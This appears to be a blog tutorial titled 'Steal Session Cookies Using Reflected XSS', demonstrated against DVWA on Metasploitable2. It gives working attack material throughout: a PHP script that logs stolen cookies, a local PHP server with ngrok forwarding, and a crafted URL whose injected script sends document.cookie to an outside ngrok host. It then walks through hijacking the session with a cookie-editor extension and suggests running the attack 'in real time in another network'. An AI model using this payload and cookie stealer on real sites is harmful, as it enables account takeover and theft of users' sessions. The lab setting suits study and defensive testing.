Steal Session Cookies Using Reflected XSS
What is XSS (Cross site scripting) ?
- Cross site scripting is client side attack
- It usualy happens because browser wrongly predict and execute the user input as a part web page’s java script source code
Types of XSS vulnerability ?
- Reflected XSS
- Stored XSS
- DOM based XSS
Now we fully focused on reflected XSS to steal cookies
What an attacker could do with this vulnerability?
- Get your session cookies
- Can implement javascript keylogger
- Can inject other malicious links on the page
- Can access your webcam and microphone
- Etc…,
How XSS Works ?
Now the hacker find a XSS vulnerability in a website.
The next step the hacker create malicious link and include a malicious file (E.G -keylogger). now sending the link to the victim and he opens a link in browser.
Now what Happens ?
The included javascript will execute victims browser , (e.g if the hacker include a keylogger or Session cookie stealer then the script execute and the keystrokes or cookies sends to attacker device)
Cookie stealing ( with reflected XSS)
- Just imagine amazon website has a XSS vulnerability and you are logged in on amazon in your browser
- Attacker sends a amazon link
- The link sends by attacker contains malicious javascript code
- If you open it on your browser your browser will authenticate you with amazon site using the session cookies
- Javascript code copy the cookies and send it to the attacker
Let’s do it
I’m using here metasploitable2 DVWA for testing
Lets login
OK . This is the page to test reflected XSS . it have a input field. just enter a string to the input field.
I’m gave a name NullXploiter to the input field and it reflected
Ok now inject XSS payload
Payload : <script>alert(“Hacked”)</script>
See the alert box is triggered because the javascript code executed. lets see the source code
it embed in souce code and executed
Now lets create cookie stealer using php . create a file called index.php
And the source code
<?php
$cookie = $_GET[‘c’];
$file = fopen(‘log.txt’,’a’);
fwrite($file,$cookie.”\n\n”);?>
Now vulnerability identified and created a cookie stealer.
Now prepare a malicious link
Copy the base URL and modify the URL
http://192.168.43.199/dvwa/vulnerabilities/xss_r/?name=
In the the above URL is a base URL then inject javascript code for steal cookies
And one more thing we create a php server (Location : same location to the index.php file )for receive cookies and ngrok for port forwording
cmd : php -S localhost:7777
If you perform a attack in real time in another network use ngrok for port forwording
Now we inject a payload in the base URL
http://192.168.43.199/dvwa/vulnerabilities/xss_r/?name=<script>document.location=”http://515f-2401-4900-4841-612b-5c8-4c6-dc92-16a1.ngrok.io/?c=”+document.cookie</script>
We injected a server URL and (document.cookie) for cookie stealing
Now the malicious link is ready . if the victim clicks the malicious URLthey go to DVWA website and if a victim already logged in. then the cookies stealed and send to our machine
Now copy the URL and put in a browser
Lets assume its a victim browser
Hit enter
it cannot steal cookies right now because my browser’s XSS auditor is on
so i copy only the javascript code and pasted the input field manually and hit enter
Lets see the URL redirected to malicious link and stealed cookies
now check the URL it reflects session cookie and also check log file
Now grep the cookie value and login DVWA without authentication
I’m using chrome browser right now
OK Now log in without credentials only using stealed cookies
I’m using edit this cookie extension
now insert a cookie value in the extension and save it
now directly access the index page
Now hit enter …
Success !!!
Now directly logged in index page….
